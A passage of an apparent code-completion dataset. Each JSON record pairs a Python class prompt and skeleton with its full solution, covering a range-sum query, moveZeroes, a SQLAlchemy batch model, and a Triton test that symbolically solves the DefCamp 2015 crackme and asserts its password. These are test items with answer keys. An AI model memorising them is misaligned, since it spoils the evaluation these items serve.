self.lusum[i].append(self.lsum[i][j] + self.lusum[i - 1][j])\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\":type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n ans = 0\n ans += self.lusum[row2][col2]\n if row1 > 0:\n ans -= self.lusum[row1 - 1][col2]\n if col1 > 0:\n ans -= self.lusum[row2][col1 - 1]\n if row1 > 0 and col1 > 0:\n ans += self.lusum[row1 - 1][col1 - 1]\n return ans\n", "source": "the_stack_v2_python_sparse", "source_path": "0304/RangeSumQuery.py", "source_repo": "UchihaSean/LeetCode", "split": "test", "star_events_count": 1} {"blob_id": "265946f67b70ea6c96ed04389c31650606dacc63", "bodies": ["l, r, size = (0, 0, len(nums))\nwhile r < size:\n if nums[r] != 0:\n nums[l], nums[r] = (nums[r], nums[l])\n l += 1\n r += 1\nprint(nums)", "size, l = (len(nums), 0)\nfor i in range(0, size):\n if nums[i] != 0:\n nums[l] = nums[i]\n l += 1\nfor i in range(l, size):\n nums[i] = 0"], "bodies_text": "<|body_start_0|>\n l, r, size = (0, 0, len(nums))\n while r < size:\n if nums[r] != 0:\n nums[l], nums[r] = (nums[r], nums[l])\n l += 1\n r += 1\n print(nums)\n<|end_body_0|>\n\n<|body_start_1|>\n size, l = (len(nums), 0)\n for i in range(0, size):\n if nums[i] != 0:\n nums[l] = nums[i]\n l += 1\n for i in range(l, size):\n nums[i] = 0\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_0|>\n\n def moveZeroes1(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n l, r, size = (0, 0, len(nums))\n while r < size:\n if nums[r] != 0:\n nums[l], nums[r] = (nums[r], nums[l])\n l += 1\n r += 1\n print(nums)\n<|end_body_0|>\n\n<|body_start_1|>\n size, l = (len(nums), 0)\n for i in range(0, size):\n if nums[i] != 0:\n nums[l] = nums[i]\n l += 1\n for i in range(l, size):\n nums[i] = 0\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000228", "length_bytes": 802, "license_type": "no_license", "methods": [{"docstring": "Do not return anything, modify nums in-place instead.", "name": "moveZeroes", "signature": "def moveZeroes(self, nums: List[int]) -> None"}, {"docstring": "Do not return anything, modify nums in-place instead.", "name": "moveZeroes1", "signature": "def moveZeroes1(self, nums: List[int]) -> None"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006116", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def moveZeroes(self, nums: List[int]) -> None: Do not return anything, modify nums in-place instead.\n- def moveZeroes1(self, nums: List[int]) -> None: Do not return anything, modify nums in-place instead.", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def moveZeroes(self, nums: List[int]) -> None: Do not return anything, modify nums in-place instead.\n- def moveZeroes1(self, nums: List[int]) -> None: Do not return anything, modify nums in-place instead.\n\n<|skeleton|>\nclass Solution:\n\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_0|>\n\n def 
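The `NumMatrix` record above precomputes row prefix sums (`lsum`) and then column-accumulates them (`lusum`), so `sumRegion` answers any rectangle in O(1) by inclusion-exclusion: S = P[r2][c2] - P[r1-1][c2] - P[r2][c1-1] + P[r1-1][c1-1]. A short standalone check of that identity against brute force, using local names rather than the record's class:

def brute(matrix, r1, c1, r2, c2):
    return sum(matrix[i][j] for i in range(r1, r2 + 1) for j in range(c1, c2 + 1))

matrix = [[3, 0, 1], [5, 6, 3], [1, 2, 0]]
# Build row-running sums, then add the cell directly above (as in __init__).
lusum = [[0] * len(matrix[0]) for _ in matrix]
for i, row in enumerate(matrix):
    run = 0
    for j, v in enumerate(row):
        run += v
        lusum[i][j] = run + (lusum[i - 1][j] if i else 0)

def region(r1, c1, r2, c2):
    ans = lusum[r2][c2]
    if r1:
        ans -= lusum[r1 - 1][c2]      # strip rows above
    if c1:
        ans -= lusum[r2][c1 - 1]      # strip columns to the left
    if r1 and c1:
        ans += lusum[r1 - 1][c1 - 1]  # add back the doubly-subtracted corner
    return ans

assert region(1, 1, 2, 2) == brute(matrix, 1, 1, 2, 2) == 11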
moveZeroes1(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n l, r, size = (0, 0, len(nums))\n while r < size:\n if nums[r] != 0:\n nums[l], nums[r] = (nums[r], nums[l])\n l += 1\n r += 1\n print(nums)\n<|end_body_0|>\n\n<|body_start_1|>\n size, l = (len(nums), 0)\n for i in range(0, size):\n if nums[i] != 0:\n nums[l] = nums[i]\n l += 1\n for i in range(l, size):\n nums[i] = 0\n<|end_body_1|>\n", "revision_id": "d74389704de4ce519a22061191b626b7204d4dbc", "skeleton": "<|skeleton|>\nclass Solution:\n\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_0|>\n\n def moveZeroes1(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n l, r, size = (0, 0, len(nums))\n while r < size:\n if nums[r] != 0:\n nums[l], nums[r] = (nums[r], nums[l])\n l += 1\n r += 1\n print(nums)\n\n def moveZeroes1(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n size, l = (len(nums), 0)\n for i in range(0, size):\n if nums[i] != 0:\n nums[l] = nums[i]\n l += 1\n for i in range(l, size):\n nums[i] = 0\n", "source": "the_stack_v2_python_sparse", "source_path": "01_array/easy_283_moveZeroes.py", "source_repo": "MrLW/algorithm", "split": "test", "star_events_count": 0} {"blob_id": "68ef1223d3022307efa878db16af851897523fd7", "bodies": ["batch = cls(name=name, on_weekdays=on_weekdays, on_weekends=on_weekends, clazz=clazz, target_year=target_year, target_exam=target_exam, type=type, other=other, batch_timings=batch_timings, institute_id=institute_id)\ndb.session.add(batch)\ntry:\n db.session.commit()\nexcept IntegrityError:\n db.session.rollback()\n raise BatchNameAlreadyTaken\nreturn batch", "batch = cls.query.get(id)\nif batch is None:\n raise InvalidBatchId\nreturn batch", "exprs = []\nif days is not None:\n if days == 'weekdays':\n exprs.append(Batch.on_weekdays == True)\n if days == 'weekends':\n exprs.append(Batch.on_weekends == True)\nif type is not None:\n exprs.append(Batch.type == type)\nif target_year is not None:\n exprs.append(Batch.target_year == target_year)\nif target_exam is not None:\n exprs.append(Batch.target_exam == target_exam)\nif institute_id is not None:\n exprs.append(Batch.institute_id == institute_id)\nif include_ids is not None and (isinstance(include_ids, list) or isinstance(include_ids, tuple) or isinstance(include_ids, set)):\n exprs.append(Batch.id.in_(list(include_ids)))\nif branches is not None and (isinstance(branches, list) or isinstance(branches, tuple) or isinstance(branches, set)):\n target_exam_list = []\n engineering_exams = ['1', '2', '3']\n medical_exams = ['4', '5']\n if '1' in branches:\n target_exam_list.extend(engineering_exams)\n if '2' in branches:\n target_exam_list.extend(medical_exams)\n exprs.append(Batch.target_exam.in_(list(target_exam_list)))\nif status is None:\n status = 1\nif status != -1:\n exprs.append(Batch.status == status)\nreturn Batch.query.filter(*exprs).order_by(Batch.created_at.desc()).all()"], "bodies_text": "<|body_start_0|>\n batch = cls(name=name, on_weekdays=on_weekdays, on_weekends=on_weekends, 
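The `moveZeroes` body above is the classic two-pointer partition: `l` marks the write slot for the next non-zero while `r` scans, and swapping preserves the relative order of the non-zero elements (the `print(nums)` in the recorded body reads like leftover debugging output). A compact runnable form of the same idea:

def move_zeroes(nums):
    l = 0
    for r in range(len(nums)):
        if nums[r] != 0:
            nums[l], nums[r] = nums[r], nums[l]  # swap non-zero into write slot
            l += 1
    return nums

assert move_zeroes([0, 1, 0, 3, 12]) == [1, 3, 12, 0, 0]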
clazz=clazz, target_year=target_year, target_exam=target_exam, type=type, other=other, batch_timings=batch_timings, institute_id=institute_id)\n db.session.add(batch)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n raise BatchNameAlreadyTaken\n return batch\n<|end_body_0|>\n\n<|body_start_1|>\n batch = cls.query.get(id)\n if batch is None:\n raise InvalidBatchId\n return batch\n<|end_body_1|>\n\n<|body_start_2|>\n exprs = []\n if days is not None:\n if days == 'weekdays':\n exprs.append(Batch.on_weekdays == True)\n if days == 'weekends':\n exprs.append(Batch.on_weekends == True)\n if type is not None:\n exprs.append(Batch.type == type)\n if target_year is not None:\n exprs.append(Batch.target_year == target_year)\n if target_exam is not None:\n exprs.append(Batch.target_exam == target_exam)\n if institute_id is not None:\n exprs.append(Batch.institute_id == institute_id)\n if include_ids is not None and (isinstance(include_ids, list) or isinstance(include_ids, tuple) or isinstance(include_ids, set)):\n exprs.append(Batch.id.in_(list(include_ids)))\n if branches is not None and (isinstance(branches, list) or isinstance(branches, tuple) or isinstance(branches, set)):\n target_exam_list = []\n engineering_exams = ['1', '2', '3']\n medical_exams = ['4', '5']\n if '1' in branches:\n target_exam_list.extend(engineering_exams)\n if '2' in branches:\n target_exam_list.extend(medical_exams)\n exprs.append(Batch.target_exam.in_(list(target_exam_list)))\n if status is None:\n status = 1\n if status != -1:\n exprs.append(Batch.status == status)\n return Batch.query.filter(*exprs).order_by(Batch.created_at.desc()).all()\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Batch", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Batch:\n\n def create(cls, name, on_weekdays, on_weekends, clazz, target_year, target_exam, type, other, batch_timings, institute_id):\n \"\"\"Create a new batch :param name: :param on_weekdays: :param on_weekends: :param clazz: :param target_year: :param target_exam: :param type: :param other: some text about batch :param batch_timings: string in the form ``h1:m1-h2:m2`` :param institute_id: :return:\"\"\"\n <|body_0|>\n\n def get(cls, id):\n \"\"\"Get a single batch :param id: :return:\"\"\"\n <|body_1|>\n\n def get_filtered(cls, days=None, type=None, target_year=None, target_exam=None, include_ids=None, institute_id=None, status=None, branches=None):\n \"\"\"Get a list of batches after applying filters :param days: :param type: :param target_year: :param target_exam: :param include_ids: :param institute_id: :param status: :param target_exam_list: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n batch = cls(name=name, on_weekdays=on_weekdays, on_weekends=on_weekends, clazz=clazz, target_year=target_year, target_exam=target_exam, type=type, other=other, batch_timings=batch_timings, institute_id=institute_id)\n db.session.add(batch)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n raise BatchNameAlreadyTaken\n return batch\n<|end_body_0|>\n\n<|body_start_1|>\n batch = cls.query.get(id)\n if batch is None:\n raise InvalidBatchId\n return batch\n<|end_body_1|>\n\n<|body_start_2|>\n exprs = []\n if days is not None:\n if days == 'weekdays':\n exprs.append(Batch.on_weekdays == True)\n if days == 'weekends':\n exprs.append(Batch.on_weekends == True)\n if type is not None:\n exprs.append(Batch.type == type)\n if target_year is not 
None:\n exprs.append(Batch.target_year == target_year)\n if target_exam is not None:\n exprs.append(Batch.target_exam == target_exam)\n if institute_id is not None:\n exprs.append(Batch.institute_id == institute_id)\n if include_ids is not None and (isinstance(include_ids, list) or isinstance(include_ids, tuple) or isinstance(include_ids, set)):\n exprs.append(Batch.id.in_(list(include_ids)))\n if branches is not None and (isinstance(branches, list) or isinstance(branches, tuple) or isinstance(branches, set)):\n target_exam_list = []\n engineering_exams = ['1', '2', '3']\n medical_exams = ['4', '5']\n if '1' in branches:\n target_exam_list.extend(engineering_exams)\n if '2' in branches:\n target_exam_list.extend(medical_exams)\n exprs.append(Batch.target_exam.in_(list(target_exam_list)))\n if status is None:\n status = 1\n if status != -1:\n exprs.append(Batch.status == status)\n return Batch.query.filter(*exprs).order_by(Batch.created_at.desc()).all()\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000229", "length_bytes": 4381, "license_type": "no_license", "methods": [{"docstring": "Create a new batch :param name: :param on_weekdays: :param on_weekends: :param clazz: :param target_year: :param target_exam: :param type: :param other: some text about batch :param batch_timings: string in the form ``h1:m1-h2:m2`` :param institute_id: :return:", "name": "create", "signature": "def create(cls, name, on_weekdays, on_weekends, clazz, target_year, target_exam, type, other, batch_timings, institute_id)"}, {"docstring": "Get a single batch :param id: :return:", "name": "get", "signature": "def get(cls, id)"}, {"docstring": "Get a list of batches after applying filters :param days: :param type: :param target_year: :param target_exam: :param include_ids: :param institute_id: :param status: :param target_exam_list: :return:", "name": "get_filtered", "signature": "def get_filtered(cls, days=None, type=None, target_year=None, target_exam=None, include_ids=None, institute_id=None, status=None, branches=None)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006338", "prompt": "Implement the Python class `Batch` described below.\n\nClass description:\nImplement the Batch class.\n\nMethod signatures and docstrings:\n- def create(cls, name, on_weekdays, on_weekends, clazz, target_year, target_exam, type, other, batch_timings, institute_id): Create a new batch :param name: :param on_weekdays: :param on_weekends: :param clazz: :param target_year: :param target_exam: :param type: :param other: some text about batch :param batch_timings: string in the form ``h1:m1-h2:m2`` :param institute_id: :return:\n- def get(cls, id): Get a single batch :param id: :return:\n- def get_filtered(cls, days=None, type=None, target_year=None, target_exam=None, include_ids=None, institute_id=None, status=None, branches=None): Get a list of batches after applying filters :param days: :param type: :param target_year: :param target_exam: :param include_ids: :param institute_id: :param status: :param target_exam_list: :return:", "prompted_full_text": "Implement the Python class `Batch` described below.\n\nClass description:\nImplement the Batch class.\n\nMethod signatures and docstrings:\n- def create(cls, name, on_weekdays, on_weekends, clazz, target_year, target_exam, type, other, batch_timings, institute_id): Create a new batch :param name: :param on_weekdays: :param on_weekends: :param clazz: :param target_year: :param target_exam: :param type: :param other: some text about batch :param 
batch_timings: string in the form ``h1:m1-h2:m2`` :param institute_id: :return:\n- def get(cls, id): Get a single batch :param id: :return:\n- def get_filtered(cls, days=None, type=None, target_year=None, target_exam=None, include_ids=None, institute_id=None, status=None, branches=None): Get a list of batches after applying filters :param days: :param type: :param target_year: :param target_exam: :param include_ids: :param institute_id: :param status: :param target_exam_list: :return:\n\n<|skeleton|>\nclass Batch:\n\n def create(cls, name, on_weekdays, on_weekends, clazz, target_year, target_exam, type, other, batch_timings, institute_id):\n \"\"\"Create a new batch :param name: :param on_weekdays: :param on_weekends: :param clazz: :param target_year: :param target_exam: :param type: :param other: some text about batch :param batch_timings: string in the form ``h1:m1-h2:m2`` :param institute_id: :return:\"\"\"\n <|body_0|>\n\n def get(cls, id):\n \"\"\"Get a single batch :param id: :return:\"\"\"\n <|body_1|>\n\n def get_filtered(cls, days=None, type=None, target_year=None, target_exam=None, include_ids=None, institute_id=None, status=None, branches=None):\n \"\"\"Get a list of batches after applying filters :param days: :param type: :param target_year: :param target_exam: :param include_ids: :param institute_id: :param status: :param target_exam_list: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n batch = cls(name=name, on_weekdays=on_weekdays, on_weekends=on_weekends, clazz=clazz, target_year=target_year, target_exam=target_exam, type=type, other=other, batch_timings=batch_timings, institute_id=institute_id)\n db.session.add(batch)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n raise BatchNameAlreadyTaken\n return batch\n<|end_body_0|>\n\n<|body_start_1|>\n batch = cls.query.get(id)\n if batch is None:\n raise InvalidBatchId\n return batch\n<|end_body_1|>\n\n<|body_start_2|>\n exprs = []\n if days is not None:\n if days == 'weekdays':\n exprs.append(Batch.on_weekdays == True)\n if days == 'weekends':\n exprs.append(Batch.on_weekends == True)\n if type is not None:\n exprs.append(Batch.type == type)\n if target_year is not None:\n exprs.append(Batch.target_year == target_year)\n if target_exam is not None:\n exprs.append(Batch.target_exam == target_exam)\n if institute_id is not None:\n exprs.append(Batch.institute_id == institute_id)\n if include_ids is not None and (isinstance(include_ids, list) or isinstance(include_ids, tuple) or isinstance(include_ids, set)):\n exprs.append(Batch.id.in_(list(include_ids)))\n if branches is not None and (isinstance(branches, list) or isinstance(branches, tuple) or isinstance(branches, set)):\n target_exam_list = []\n engineering_exams = ['1', '2', '3']\n medical_exams = ['4', '5']\n if '1' in branches:\n target_exam_list.extend(engineering_exams)\n if '2' in branches:\n target_exam_list.extend(medical_exams)\n exprs.append(Batch.target_exam.in_(list(target_exam_list)))\n if status is None:\n status = 1\n if status != -1:\n exprs.append(Batch.status == status)\n return Batch.query.filter(*exprs).order_by(Batch.created_at.desc()).all()\n<|end_body_2|>\n", "revision_id": "c8af233693cd6a97489a2d73a85646b15220389c", "skeleton": "<|skeleton|>\nclass Batch:\n\n def create(cls, name, on_weekdays, on_weekends, clazz, target_year, target_exam, type, other, batch_timings, institute_id):\n \"\"\"Create a new batch :param name: :param on_weekdays: :param on_weekends: :param clazz: :param target_year: :param 
target_exam: :param type: :param other: some text about batch :param batch_timings: string in the form ``h1:m1-h2:m2`` :param institute_id: :return:\"\"\"\n <|body_0|>\n\n def get(cls, id):\n \"\"\"Get a single batch :param id: :return:\"\"\"\n <|body_1|>\n\n def get_filtered(cls, days=None, type=None, target_year=None, target_exam=None, include_ids=None, institute_id=None, status=None, branches=None):\n \"\"\"Get a list of batches after applying filters :param days: :param type: :param target_year: :param target_exam: :param include_ids: :param institute_id: :param status: :param target_exam_list: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Batch:\n def create(cls, name, on_weekdays, on_weekends, clazz, target_year, target_exam, type, other, batch_timings, institute_id):\n \"\"\"Create a new batch :param name: :param on_weekdays: :param on_weekends: :param clazz: :param target_year: :param target_exam: :param type: :param other: some text about batch :param batch_timings: string in the form ``h1:m1-h2:m2`` :param institute_id: :return:\"\"\"\n batch = cls(name=name, on_weekdays=on_weekdays, on_weekends=on_weekends, clazz=clazz, target_year=target_year, target_exam=target_exam, type=type, other=other, batch_timings=batch_timings, institute_id=institute_id)\n db.session.add(batch)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n raise BatchNameAlreadyTaken\n return batch\n\n def get(cls, id):\n \"\"\"Get a single batch :param id: :return:\"\"\"\n batch = cls.query.get(id)\n if batch is None:\n raise InvalidBatchId\n return batch\n\n def get_filtered(cls, days=None, type=None, target_year=None, target_exam=None, include_ids=None, institute_id=None, status=None, branches=None):\n \"\"\"Get a list of batches after applying filters :param days: :param type: :param target_year: :param target_exam: :param include_ids: :param institute_id: :param status: :param target_exam_list: :return:\"\"\"\n exprs = []\n if days is not None:\n if days == 'weekdays':\n exprs.append(Batch.on_weekdays == True)\n if days == 'weekends':\n exprs.append(Batch.on_weekends == True)\n if type is not None:\n exprs.append(Batch.type == type)\n if target_year is not None:\n exprs.append(Batch.target_year == target_year)\n if target_exam is not None:\n exprs.append(Batch.target_exam == target_exam)\n if institute_id is not None:\n exprs.append(Batch.institute_id == institute_id)\n if include_ids is not None and (isinstance(include_ids, list) or isinstance(include_ids, tuple) or isinstance(include_ids, set)):\n exprs.append(Batch.id.in_(list(include_ids)))\n if branches is not None and (isinstance(branches, list) or isinstance(branches, tuple) or isinstance(branches, set)):\n target_exam_list = []\n engineering_exams = ['1', '2', '3']\n medical_exams = ['4', '5']\n if '1' in branches:\n target_exam_list.extend(engineering_exams)\n if '2' in branches:\n target_exam_list.extend(medical_exams)\n exprs.append(Batch.target_exam.in_(list(target_exam_list)))\n if status is None:\n status = 1\n if status != -1:\n exprs.append(Batch.status == status)\n return Batch.query.filter(*exprs).order_by(Batch.created_at.desc()).all()\n", "source": "the_stack_v2_python_sparse", "source_path": "exam_app/models/batch.py", "source_repo": "GraphicalDot/testrocketbackend", "split": "test", "star_events_count": 0} {"blob_id": "9fbb26001a4626f2cae63159fd5b981d93e044d6", "bodies": ["astCtxt 
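`Batch.get_filtered` above builds a list of SQLAlchemy boolean expressions and splats it into `Batch.query.filter(*exprs)`, with `status` defaulting to 1 and `-1` meaning "any". The same accumulate-then-apply shape, sketched over plain dicts so it runs without a database; the sample rows are made up:

batches = [
    {'id': 1, 'on_weekends': True,  'type': '1', 'status': 1},
    {'id': 2, 'on_weekends': False, 'type': '2', 'status': 1},
    {'id': 3, 'on_weekends': True,  'type': '1', 'status': 0},
]

def get_filtered(days=None, type=None, status=None):
    preds = []                                   # stands in for exprs = []
    if days == 'weekends':
        preds.append(lambda b: b['on_weekends'])
    if type is not None:
        preds.append(lambda b: b['type'] == type)
    status = 1 if status is None else status     # same default as the model
    if status != -1:
        preds.append(lambda b: b['status'] == status)
    return [b for b in batches if all(p(b) for p in preds)]

assert [b['id'] for b in get_filtered(days='weekends', type='1')] == [1]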
= self.Triton.getAstContext()\nwhile pc:\n opcode = self.Triton.getConcreteMemoryAreaValue(pc, 16)\n instruction = Instruction()\n instruction.setOpcode(opcode)\n instruction.setAddress(pc)\n self.Triton.processing(instruction)\n self.assertTrue(checkAstIntegrity(instruction))\n if instruction.getAddress() == 4196235:\n rax = self.Triton.getSymbolicRegister(self.Triton.registers.rax)\n eax = astCtxt.extract(31, 0, rax.getAst())\n cstr = astCtxt.land([self.Triton.getPathPredicate(), astCtxt.equal(eax, astCtxt.bv(1, 32))])\n model = self.Triton.getModel(cstr)\n solution = str()\n for k, v in list(sorted(model.items())):\n value = v.getValue()\n solution += chr(value)\n self.Triton.setConcreteVariableValue(self.Triton.getSymbolicVariable(k), value)\n pc = self.Triton.getConcreteRegisterValue(self.Triton.registers.rip)\nreturn solution", "import lief\nbinary = lief.parse(filename)\nphdrs = binary.segments\nfor phdr in phdrs:\n size = phdr.physical_size\n vaddr = phdr.virtual_address\n self.Triton.setConcreteMemoryAreaValue(vaddr, list(phdr.content))", "binary_file = os.path.join(os.path.dirname(__file__), 'misc', 'defcamp-2015-r100.bin')\nself.load_binary(binary_file)\nself.Triton.setConcreteRegisterValue(self.Triton.registers.rbp, 2147483647)\nself.Triton.setConcreteRegisterValue(self.Triton.registers.rsp, 1879048191)\nself.Triton.setConcreteRegisterValue(self.Triton.registers.rdi, 268435456)\nfor index in range(30):\n self.Triton.symbolizeMemory(MemoryAccess(268435456 + index, CPUSIZE.BYTE))\nsolution = self.emulate(4196093)\nself.assertEqual(solution, 'Code_Talkers')"], "bodies_text": "<|body_start_0|>\n astCtxt = self.Triton.getAstContext()\n while pc:\n opcode = self.Triton.getConcreteMemoryAreaValue(pc, 16)\n instruction = Instruction()\n instruction.setOpcode(opcode)\n instruction.setAddress(pc)\n self.Triton.processing(instruction)\n self.assertTrue(checkAstIntegrity(instruction))\n if instruction.getAddress() == 4196235:\n rax = self.Triton.getSymbolicRegister(self.Triton.registers.rax)\n eax = astCtxt.extract(31, 0, rax.getAst())\n cstr = astCtxt.land([self.Triton.getPathPredicate(), astCtxt.equal(eax, astCtxt.bv(1, 32))])\n model = self.Triton.getModel(cstr)\n solution = str()\n for k, v in list(sorted(model.items())):\n value = v.getValue()\n solution += chr(value)\n self.Triton.setConcreteVariableValue(self.Triton.getSymbolicVariable(k), value)\n pc = self.Triton.getConcreteRegisterValue(self.Triton.registers.rip)\n return solution\n<|end_body_0|>\n\n<|body_start_1|>\n import lief\n binary = lief.parse(filename)\n phdrs = binary.segments\n for phdr in phdrs:\n size = phdr.physical_size\n vaddr = phdr.virtual_address\n self.Triton.setConcreteMemoryAreaValue(vaddr, list(phdr.content))\n<|end_body_1|>\n\n<|body_start_2|>\n binary_file = os.path.join(os.path.dirname(__file__), 'misc', 'defcamp-2015-r100.bin')\n self.load_binary(binary_file)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rbp, 2147483647)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rsp, 1879048191)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rdi, 268435456)\n for index in range(30):\n self.Triton.symbolizeMemory(MemoryAccess(268435456 + index, CPUSIZE.BYTE))\n solution = self.emulate(4196093)\n self.assertEqual(solution, 'Code_Talkers')\n<|end_body_2|>\n", "class_docstring": "Test for DefCamp2015 challenge.", "class_name": "DefCamp2015", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass 
DefCamp2015:\n \"\"\"Test for DefCamp2015 challenge.\"\"\"\n\n def emulate(self, pc):\n \"\"\"Emulate every opcode from pc. * Process instruction until the end and search for constraint resolution on cmp eax, 1 then self.Triton.set the new correct value and keep going.\"\"\"\n <|body_0|>\n\n def load_binary(self, filename):\n \"\"\"Load in memory every opcode from an elf program.\"\"\"\n <|body_1|>\n\n def test_defcamp_2015(self):\n \"\"\"Load binary, self.Triton.setup environment and solve challenge with sym eval.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n astCtxt = self.Triton.getAstContext()\n while pc:\n opcode = self.Triton.getConcreteMemoryAreaValue(pc, 16)\n instruction = Instruction()\n instruction.setOpcode(opcode)\n instruction.setAddress(pc)\n self.Triton.processing(instruction)\n self.assertTrue(checkAstIntegrity(instruction))\n if instruction.getAddress() == 4196235:\n rax = self.Triton.getSymbolicRegister(self.Triton.registers.rax)\n eax = astCtxt.extract(31, 0, rax.getAst())\n cstr = astCtxt.land([self.Triton.getPathPredicate(), astCtxt.equal(eax, astCtxt.bv(1, 32))])\n model = self.Triton.getModel(cstr)\n solution = str()\n for k, v in list(sorted(model.items())):\n value = v.getValue()\n solution += chr(value)\n self.Triton.setConcreteVariableValue(self.Triton.getSymbolicVariable(k), value)\n pc = self.Triton.getConcreteRegisterValue(self.Triton.registers.rip)\n return solution\n<|end_body_0|>\n\n<|body_start_1|>\n import lief\n binary = lief.parse(filename)\n phdrs = binary.segments\n for phdr in phdrs:\n size = phdr.physical_size\n vaddr = phdr.virtual_address\n self.Triton.setConcreteMemoryAreaValue(vaddr, list(phdr.content))\n<|end_body_1|>\n\n<|body_start_2|>\n binary_file = os.path.join(os.path.dirname(__file__), 'misc', 'defcamp-2015-r100.bin')\n self.load_binary(binary_file)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rbp, 2147483647)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rsp, 1879048191)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rdi, 268435456)\n for index in range(30):\n self.Triton.symbolizeMemory(MemoryAccess(268435456 + index, CPUSIZE.BYTE))\n solution = self.emulate(4196093)\n self.assertEqual(solution, 'Code_Talkers')\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000230", "length_bytes": 18108, "license_type": "permissive", "methods": [{"docstring": "Emulate every opcode from pc. * Process instruction until the end and search for constraint resolution on cmp eax, 1 then self.Triton.set the new correct value and keep going.", "name": "emulate", "signature": "def emulate(self, pc)"}, {"docstring": "Load in memory every opcode from an elf program.", "name": "load_binary", "signature": "def load_binary(self, filename)"}, {"docstring": "Load binary, self.Triton.setup environment and solve challenge with sym eval.", "name": "test_defcamp_2015", "signature": "def test_defcamp_2015(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000713", "prompt": "Implement the Python class `DefCamp2015` described below.\n\nClass description:\nTest for DefCamp2015 challenge.\n\nMethod signatures and docstrings:\n- def emulate(self, pc): Emulate every opcode from pc. 
* Process instruction until the end and search for constraint resolution on cmp eax, 1 then self.Triton.set the new correct value and keep going.\n- def load_binary(self, filename): Load in memory every opcode from an elf program.\n- def test_defcamp_2015(self): Load binary, self.Triton.setup environment and solve challenge with sym eval.", "prompted_full_text": "Implement the Python class `DefCamp2015` described below.\n\nClass description:\nTest for DefCamp2015 challenge.\n\nMethod signatures and docstrings:\n- def emulate(self, pc): Emulate every opcode from pc. * Process instruction until the end and search for constraint resolution on cmp eax, 1 then self.Triton.set the new correct value and keep going.\n- def load_binary(self, filename): Load in memory every opcode from an elf program.\n- def test_defcamp_2015(self): Load binary, self.Triton.setup environment and solve challenge with sym eval.\n\n<|skeleton|>\nclass DefCamp2015:\n \"\"\"Test for DefCamp2015 challenge.\"\"\"\n\n def emulate(self, pc):\n \"\"\"Emulate every opcode from pc. * Process instruction until the end and search for constraint resolution on cmp eax, 1 then self.Triton.set the new correct value and keep going.\"\"\"\n <|body_0|>\n\n def load_binary(self, filename):\n \"\"\"Load in memory every opcode from an elf program.\"\"\"\n <|body_1|>\n\n def test_defcamp_2015(self):\n \"\"\"Load binary, self.Triton.setup environment and solve challenge with sym eval.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n astCtxt = self.Triton.getAstContext()\n while pc:\n opcode = self.Triton.getConcreteMemoryAreaValue(pc, 16)\n instruction = Instruction()\n instruction.setOpcode(opcode)\n instruction.setAddress(pc)\n self.Triton.processing(instruction)\n self.assertTrue(checkAstIntegrity(instruction))\n if instruction.getAddress() == 4196235:\n rax = self.Triton.getSymbolicRegister(self.Triton.registers.rax)\n eax = astCtxt.extract(31, 0, rax.getAst())\n cstr = astCtxt.land([self.Triton.getPathPredicate(), astCtxt.equal(eax, astCtxt.bv(1, 32))])\n model = self.Triton.getModel(cstr)\n solution = str()\n for k, v in list(sorted(model.items())):\n value = v.getValue()\n solution += chr(value)\n 